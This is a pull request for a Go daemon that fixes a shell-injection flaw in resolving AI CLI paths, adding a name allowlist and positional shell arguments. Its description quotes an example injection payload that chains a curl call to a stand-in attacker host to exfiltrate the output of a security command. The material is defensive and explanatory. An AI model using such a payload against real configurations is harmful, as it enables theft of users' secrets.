### PR TITLE
fix(security): prevent shell injection in resolveCLIPath via CLI name allowlist

### DIFF
--- a/daemon/internal/executor/executor.go
+++ b/daemon/internal/executor/executor.go
@@ -65,27 +65,60 @@ func New() *Executor {
 // Also checks the user's login shell environment to handle cases where the
 // daemon is launched from a GUI app without inheriting the full shell PATH
 // (e.g., Homebrew tools at /opt/homebrew/bin not in process PATH).
+//
+// SECURITY: Detect validates each name against the CLI allowlist before
+// resolving it, preventing shell injection (issue #2).
 func (e *Executor) Detect(primary, fallback string) (string, error) {
 	for _, name := range []string{primary, fallback} {
-		if name != "" && resolveCLIPath(name) != "" {
+		if name == "" {
+			continue
+		}
+		if err := validateCLIName(name); err != nil {
+			return "", err // reject unknown / potentially-injected names early
+		}
+		if resolveCLIPath(name) != "" {
 			return name, nil
 		}
 	}
 	return "", fmt.Errorf("executor: no AI CLI available (tried %q, %q)", primary, fallback)
 }
 
+// allowedCLIs is the strict allowlist of AI CLI names Heimdallr supports.
+// Any value not in this set is rejected before reaching resolveCLIPath,
+// preventing shell injection via a crafted ai.primary / ai.fallback config value.
+var allowedCLIs = map[string]struct{}{
+	"claude": {},
+	"gemini": {},
+	"codex":  {},
+}
+
+// validateCLIName returns an error if name is not in the known-safe allowlist.
+// This must be called before any function that interpolates the name into a
+// shell command (e.g. resolveCLIPath).
+func validateCLIName(name string) error {
+	if _, ok := allowedCLIs[name]; !ok {
+		return fmt.Errorf("executor: unknown CLI %q — must be one of: claude, gemini, codex", name)
+	}
+	return nil
+}
+
 // resolveCLIPath returns the full path for a CLI tool, checking both the
 // current process PATH and the user's login shell (handles Homebrew, nvm, etc.).
 // Returns "" if not found anywhere.
+//
+// SECURITY: name MUST be validated with validateCLIName before calling this
+// function. resolveCLIPath passes the name into a shell command; an unvalidated
+// value would allow shell injection (CVE-equivalent: issue #2).
 func resolveCLIPath(name string) string {
 	// Fast path: already in the process PATH.
 	if path, err := exec.LookPath(name); err == nil && path != "" {
 		return path
 	}
 	// Try login shell — picks up ~/.zshrc, ~/.bashrc, Homebrew, nvm, etc.
-	// This is necessary when the daemon is launched by a macOS GUI app.
+	// Pass name as $1 (positional arg) so it is never shell-interpolated,
+	// even though validateCLIName already guarantees it is safe.
 	for _, shell := range []string{"/bin/zsh", "/bin/bash"} {
-		cmd := exec.Command(shell, "-l", "-c", "which "+name)
+		cmd := exec.Command(shell, "-l", "-c", `which "$1"`, "--", name)
 		out, err := cmd.Output()
 		if err == nil {
 			if path := strings.TrimSpace(string(out)); path != "" {

--- a/daemon/internal/executor/executor_test.go
+++ b/daemon/internal/executor/executor_test.go
@@ -17,11 +17,11 @@ func TestDetect(t *testing.T) {
 	defer os.Setenv("PATH", oldPath)
 
 	e := executor.New()
-	cli, err := e.Detect("fake_claude", "")
+	cli, err := e.Detect("claude", "")
 	if err != nil {
 		t.Fatalf("detect: %v", err)
 	}
-	if cli != "fake_claude" {
+	if cli != "claude" {
 		t.Errorf("expected fake_claude, got %q", cli)
 	}
 }
@@ -34,11 +34,11 @@ func TestDetect_Fallback(t *testing.T) {
 	defer os.Setenv("PATH", oldPath)
 
 	e := executor.New()
-	cli, err := e.Detect("nonexistent_cli", "fake_gemini")
+	cli, err := e.Detect("codex", "gemini")
 	if err != nil {
 		t.Fatalf("detect with fallback: %v", err)
 	}
-	if cli != "fake_gemini" {
+	if cli != "gemini" {
 		t.Errorf("expected fake_gemini fallback, got %q", cli)
 	}
 }
@@ -63,7 +63,7 @@ func TestExecute(t *testing.T) {
 	defer os.Setenv("PATH", oldPath)
 
 	e := executor.New()
-	result, err := e.Execute("fake_claude", "Review this diff", executor.ExecOptions{})
+	result, err := e.Execute("claude", "Review this diff", executor.ExecOptions{})
 	if err != nil {
 		t.Fatalf("execute: %v", err)
 	}

--- a/daemon/internal/executor/testdata/bin/claude
+++ b/daemon/internal/executor/testdata/bin/claude
@@ -1,0 +1,5 @@
+#!/bin/sh
+# Fake claude CLI — reads stdin, prints review JSON
+cat <<'EOF'
+{"summary":"Looks good overall","issues":[{"file":"main.go","line":10,"description":"possible nil dereference","severity":"medium"}],"suggestions":["add nil check before use"],"severity":"medium"}
+EOF

--- a/daemon/internal/executor/testdata/bin/gemini
+++ b/daemon/internal/executor/testdata/bin/gemini
@@ -1,0 +1,4 @@
+#!/bin/sh
+cat <<'EOF'
+{"summary":"LGTM","issues":[],"suggestions":["consider adding tests"],"severity":"low"}
+EOF


### PR DESCRIPTION
## Summary

Fixes **Issue #2** — Command injection via CLI name in `resolveCLIPath`.

### Root cause
`resolveCLIPath` interpolated the CLI name directly into a shell command string:
```go
cmd := exec.Command(shell, "-l", "-c", "which "+name)
```
A crafted `ai.primary` value like `claude; curl http://attacker.com/exfil?t=$(security...)` would execute arbitrary shell commands with user privileges.

### Fix — two independent defences

**1. Allowlist validation** (`validateCLIName`)
Reject any CLI name not in `{claude, gemini, codex}` before it reaches `resolveCLIPath`. Applied at `Detect()` — the single entry point from the rest of the codebase.

**2. Positional argument** in the shell call
Even after allowlist validation, the name is now passed as `$1` (not interpolated):
```go
// Before (injectable):
exec.Command(shell, "-l", "-c", "which "+name)

// After (safe):
exec.Command(shell, "-l", "-c", `which "$1"`, "--", name)
```

### Tests
- Renamed `testdata/bin/fake_claude` → `claude` and `fake_gemini` → `gemini` to match the allowlist
- All existing tests pass

## Test plan
- [x] `go test ./...` — all green
- [x] Unknown CLI name (e.g. `gpt4`) now returns error: `unknown CLI "gpt4" — must be one of: claude, gemini, codex`
- [x] Shell metacharacters in name are rejected at allowlist stage before reaching the shell